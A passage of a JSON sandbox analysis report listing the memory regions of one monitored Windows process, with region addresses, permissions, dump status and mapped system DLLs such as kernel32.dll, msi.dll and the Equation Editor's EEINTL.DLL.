"filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 1998127104, "type": "region", "version": 1 }, "end_va": 1998131199, "entry_point": 1998127104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_358", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 1998127104, "timestamp": "00:00:22.728", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_359", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:22.728", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000360-addr_0x000000007ffd3000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_23", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147299328, "type": "region", "version": 1 }, "end_va": 2147303423, "entry_point": 0, "filename": null, "id": "region_360", "name": "private_0x000000007ffd3000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147299328, "timestamp": "00:00:22.728", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000361-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_24", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_361", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:22.728", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000362-addr_0x0000000000210000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_25", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 3211263, "entry_point": 0, "filename": null, "id": "region_362", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:00:22.751", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1965424640, "type": "region", "version": 1 }, "end_va": 1965727743, "entry_point": 1965424640, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_363", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965424640, "timestamp": "00:00:22.751", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1992359936, "type": "region", "version": 1 }, "end_va": 1993228287, "entry_point": 1992359936, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_364", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1992359936, "timestamp": "00:00:22.751", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_365", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:22.762", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1798143, "entry_point": 1376256, "filename": "\\Windows\\System32\\locale.nls", "id": "region_366", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1376256, "timestamp": "00:00:22.762", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 540672, "start_va": 1915289600, "type": "region", "version": 1 }, "end_va": 1915830271, "entry_point": 1915289600, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "id": "region_367", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1915289600, "timestamp": "00:00:22.762", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1967259648, "type": "region", "version": 1 }, "end_va": 1967919103, "entry_point": 1967259648, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_368", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1967259648, "timestamp": "00:00:22.808", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1967980544, "type": "region", "version": 1 }, "end_va": 1968635903, "entry_point": 1967980544, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_369", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1967980544, "timestamp": "00:00:22.808", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971388416, "type": "region", "version": 1 }, "end_va": 1984274431, "entry_point": 1971388416, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_370", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971388416, "timestamp": "00:00:22.808", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1984299008, "type": "region", "version": 1 }, "end_va": 1984339967, "entry_point": 1984299008, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_371", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1984299008, "timestamp": "00:00:22.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1985806336, "type": "region", "version": 1 }, "end_va": 1986125823, "entry_point": 1985806336, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_372", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1985806336, "timestamp": "00:00:22.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1986134016, "type": "region", "version": 1 }, "end_va": 1986957311, "entry_point": 1986134016, "filename": "\\Windows\\System32\\user32.dll", "id": "region_373", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1986134016, "timestamp": "00:00:22.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1986985984, "type": "region", "version": 1 }, "end_va": 1988411391, "entry_point": 1986985984, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_374", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1986985984, "timestamp": "00:00:22.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1988427776, "type": "region", "version": 1 }, "end_va": 1989070847, "entry_point": 1988427776, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_375", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1988427776, "timestamp": "00:00:22.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989083136, "type": "region", "version": 1 }, "end_va": 1989185535, "entry_point": 1989083136, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_376", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989083136, "timestamp": "00:00:22.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1994653696, "type": "region", "version": 1 }, "end_va": 1995358207, "entry_point": 1994653696, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_377", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1994653696, "timestamp": "00:00:22.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1997668352, "type": "region", "version": 1 }, "end_va": 1998024703, "entry_point": 1997668352, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_378", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1997668352, "timestamp": "00:00:22.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_379", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:22.809", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000380-addr_0x0000000000200000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_26", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2162687, "entry_point": 0, "filename": null, "id": "region_380", "name": "private_0x0000000000200000", "norm_filename": null, "region_type": "private_memory", "start_va": 2097152, "timestamp": "00:00:22.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 4030463, "entry_point": 0, "filename": null, "id": "region_381", "name": "pagefile_0x0000000000310000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3211264, "timestamp": "00:00:22.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 1984364544, "type": "region", "version": 1 }, "end_va": 1984491519, "entry_point": 1984364544, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_382", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1984364544, "timestamp": "00:00:22.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1992343551, "entry_point": 1991507968, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_383", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:00:22.819", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000384-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_27", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_384", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:00:22.876", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000385-addr_0x00000000001c0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_28", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1839103, "entry_point": 0, "filename": null, "id": "region_385", "name": "private_0x00000000001c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1835008, "timestamp": "00:00:22.877", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000386-addr_0x00000000001f0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_29", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2097151, "entry_point": 0, "filename": null, "id": "region_386", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:00:22.877", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 4784128, "type": "region", "version": 1 }, "end_va": 5836799, "entry_point": 0, "filename": null, "id": "region_387", "name": "pagefile_0x0000000000490000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4784128, "timestamp": "00:00:22.877", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 5898240, "type": "region", "version": 1 }, "end_va": 18481151, "entry_point": 0, "filename": null, "id": "region_388", "name": "pagefile_0x00000000005a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5898240, "timestamp": "00:00:22.877", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000389-addr_0x00000000012f0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_30", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 19857408, "type": "region", "version": 1 }, "end_va": 19922943, "entry_point": 0, "filename": null, "id": "region_389", "name": "private_0x00000000012f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 19857408, "timestamp": "00:00:22.877", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000390-addr_0x0000000001300000-size_0x0000000000400000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_31", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4194304, "start_va": 19922944, "type": "region", "version": 1 }, "end_va": 24117247, "entry_point": 0, "filename": null, "id": "region_390", "name": "private_0x0000000001300000", "norm_filename": null, "region_type": "private_memory", "start_va": 19922944, "timestamp": "00:00:22.878", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2359296, "start_va": 1892483072, "type": "region", "version": 1 }, "end_va": 1894842367, "entry_point": 1892483072, "filename": "\\Windows\\System32\\msi.dll", "id": "region_391", "name": "msi.dll", "norm_filename": "c:\\windows\\system32\\msi.dll", "region_type": "memory_mapped_file", "start_va": 1892483072, "timestamp": "00:00:22.878", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1038221312, "type": "region", "version": 1 }, "end_va": 1038278655, "entry_point": 1038221312, "filename": "\\Program Files\\Common Files\\microsoft shared\\EQUATION\\1033\\EEINTL.DLL", "id": "region_392", "name": "eeintl.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll", "region_type": "memory_mapped_file", "start_va": 1038221312, "timestamp": "00:00:22.926", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1962868736, "type": "region", "version": 1 }, "end_va": 1962917887, "entry_point": 1962868736, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_393", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1962868736, "timestamp": "00:00:22.927", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1945108480, "type": "region", "version": 1 }, "end_va": 1945370623, "entry_point": 1945108480, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_394", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1945108480, "timestamp": "00:00:22.928", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1904639, "entry_point": 0, "filename": null, "id": "region_395", "name": "pagefile_0x00000000001d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1900544, "timestamp": "00:00:22.933", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 18481152, "type": "region", "version": 1 }, "end_va": 19394559, "entry_point": 0, "filename": null, "id": "region_396", "name": "pagefile_0x00000000011a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 18481152, "timestamp": "00:00:22.933", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000397-addr_0x00000000018f0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_32", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 26148864, "type": "region", "version": 1 }, "end_va": 26411007, "entry_point": 0, "filename": null, "id": "region_397", "name": "private_0x00000000018f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 26148864, "timestamp": "00:00:22.933", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1968701440, "type": "region", "version": 1 }, "end_va": 1969287167, "entry_point": 1968701440, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_398", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1968701440, "timestamp": "00:00:22.933", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1990918144, "type": "region", "version": 1 }, "end_va": 1991454719, "entry_point": 1990918144, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_399", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1990918144, "timestamp": "00:00:22.933", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000400-addr_0x0000000001700000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_33", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 24117248, "type": "region", "version": 1 }, "end_va": 25165823, "entry_point": 0, "filename": null, "id": "region_400", "name": "private_0x0000000001700000", "norm_filename": null, "region_type": "private_memory", "start_va": 24117248, "timestamp": "00:00:23.069", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000401-addr_0x0000000001930000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_34", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 26411008, "type": "region", "version": 1 }, "end_va": 27459583, "entry_point": 0, "filename": null, "id": "region_401", "name": "private_0x0000000001930000", "norm_filename": null, "region_type": "private_memory", "start_va": 26411008, "timestamp": "00:00:23.069", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1958150144, "type": "region", "version": 1 }, "end_va": 1958240255, "entry_point": 1958150144, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_402", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1958150144, "timestamp": "00:00:23.069", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000403-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_35", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_403", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:00:23.070", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000404-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_36", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_404", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:00:23.070", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1955659776, "type": "region", "version": 1 }, "end_va": 1955901439, "entry_point": 1955659776, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_405", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1955659776, "timestamp": "00:00:23.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 27459584, "type": "region", "version": 1 }, "end_va": 30404607, "entry_point": 27459584, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_406", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 27459584, "timestamp": "00:00:23.086", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1963524096, "type": "region", "version": 1 }, "end_va": 1963581439, "entry_point": 1963524096, "filename": "\\Windows\\System32\\RpcRtRemote.dll", "id": "region_407", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\system32\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1963524096, "timestamp": "00:00:23.086", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 1994751, "entry_point": 0, "filename": null, "id": "region_408", "name": "pagefile_0x00000000001e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1966080, "timestamp": "00:00:24.041", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4071423, "entry_point": 0, "filename": null, "id": "region_409", "name": "pagefile_0x00000000003e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4063232, "timestamp": "00:00:24.041", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000410-addr_0x0000000001800000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_37", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 25165824, "type": "region", "version": 1 }, "end_va": 25690111, "entry_point": 0, "filename": null, "id": "region_410", "name": "private_0x0000000001800000", "norm_filename": null, "region_type": "private_memory", "start_va": 25165824, "timestamp": "00:00:24.042", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000411-addr_0x0000000001d00000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_38", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 30408704, "type": "region", "version": 1 }, "end_va": 31457279, "entry_point": 0, "filename": null, "id": "region_411", "name": "private_0x0000000001d00000", "norm_filename": null, "region_type": "private_memory", "start_va": 30408704, "timestamp": "00:00:24.042", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000412-addr_0x0000000001e00000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_39", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 31457280, "type": "region", "version": 1 }, "end_va": 32505855, "entry_point": 0, "filename": null, "id": "region_412", "name": "private_0x0000000001e00000", "norm_filename": null, "region_type": "private_memory", "start_va": 31457280, "timestamp": "00:00:24.042", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 32505856, "type": "region", "version": 1 }, "end_va": 33292287, "entry_point": 32505856, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_413", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", 